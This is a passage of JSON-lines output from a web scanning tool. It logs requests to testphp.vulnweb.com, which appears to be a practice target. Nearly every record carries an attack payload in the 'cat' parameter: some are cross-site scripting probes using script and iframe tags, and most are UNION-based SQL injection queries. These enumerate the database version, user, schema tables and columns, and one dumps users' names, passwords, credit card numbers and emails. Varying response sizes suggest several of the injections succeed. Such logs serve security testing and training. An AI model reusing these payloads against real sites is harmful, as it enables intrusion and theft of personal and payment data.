"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffalfsrxrjwetv5xhynulh9krdrtzndh23g%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"time\":\"356.905458ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":521,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.562740038Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%25\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%25\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3Ciframe%25\",\"time\":\"348.422116ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4984,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.720546314Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipT%3Econfirm%281%29%3C%2Fscript%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipT%3Econfirm%281%29%3C%2Fscript%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipT%3Econfirm%281%29%3C%2Fscript%3E\",\"time\":\"349.599557ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.004391198Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%253\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%253\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%253\",\"time\":\"353.32243ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4985,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.096988219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E\",\"time\":\"353.227868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4998,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.183359368Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E)%3C%2fscRipt%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%3Ealert(0x105C3E)%3C%2fscRipt%3E\",\"time\":\"345.731497ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5008,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.249608089Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752\",\"time\":\"354.698193ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.625354764Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752)%3C%2fscRipt%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%3Enetsparker(0x002752)%3C%2fscRipt%3E\",\"time\":\"358.178778ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5013,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:08.978093755Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x105C3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3CscRipt%3Enetsparker(0x105C3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3CscRipt%3Enetsparker(0x105C3E\",\"time\":\"340.252932ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:09.070533186Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat='\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat='\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat='\",\"time\":\"340.370778ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:09.249630181Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-\",\"time\":\"357.686783ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:09.731783189Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1\",\"time\":\"340.468529ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:09.896249867Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1%E2%80%99\",\"time\":\"355.043218ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:11.534760944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1%E2%80%99%EF%80%A0\",\"time\":\"353.203797ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4871,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:12.602951508Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0\",\"time\":\"341.017771ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4874,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:12.874961901Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0\",\"time\":\"340.165263ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4877,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:13.203722096Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0%EF%82%B7\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0%EF%82%B7\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1%E2%80%99%EF%80%A0%EF%80%A0%EF%80%A0%EF%82%B7\",\"time\":\"350.179538ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:13.962683664Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,group_concat(%27user:%27,uname,%27----pass:%27,pass,%27-----cc:%27,cc,%27------email:%27,email),3,4,5,6,7,8,9,10,11+from+users--+\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,group_concat(%27user:%27,uname,%27----pass:%27,pass,%27-----cc:%27,cc,%27------email:%27,email),3,4,5,6,7,8,9,10,11+from+users--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+all+select+1,group_concat(%27user:%27,uname,%27----pass:%27,pass,%27-----cc:%27,cc,%27------email:%27,email),3,4,5,6,7,8,9,10,11+from+users--+\",\"time\":\"356.186551ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5231,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:13.967091339Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"time\":\"357.76872ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.054539078Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--\",\"time\":\"347.211321ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.071023302Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version\",\"time\":\"341.38099ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5164,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.127383253Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS\",\"time\":\"360.412622ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.334999079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()--\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()--\",\"time\":\"353.801371ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5147,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.430779144Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema\",\"time\":\"342.582661ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":4876,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.503081893Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema\",\"time\":\"344.371523ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":495,\"lines\":105,\"status_code\":200,\"content_length\":4876,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.511456206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a\",\"time\":\"357.734459ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.566036483Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables\",\"time\":\"351.630659ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":6165,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.749802394Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables\",\"time\":\"352.331687ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2044,\"lines\":103,\"status_code\":200,\"content_length\":41182,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.776960556Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(colu\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(colu\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,group_concat(colu\",\"time\":\"354.380339ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.853406386Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"time\":\"358.326227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5204,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.897224281Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+\",\"time\":\"357.227349ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":622,\"lines\":103,\"status_code\":200,\"content_length\":8123,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:14.928454181Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,version%28%29,3,4,5,6,database%28%29,8,9,10,user%28%29\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,version%28%29,3,4,5,6,database%28%29,8,9,10,user%28%29\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=-1+union+select+1,version%28%29,3,4,5,6,database%28%29,8,9,10,user%28%29\",\"time\":\"348.39036ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":103,\"status_code\":200,\"content_length\":5184,\"failed\":false,\"knowledgebase\":{\"P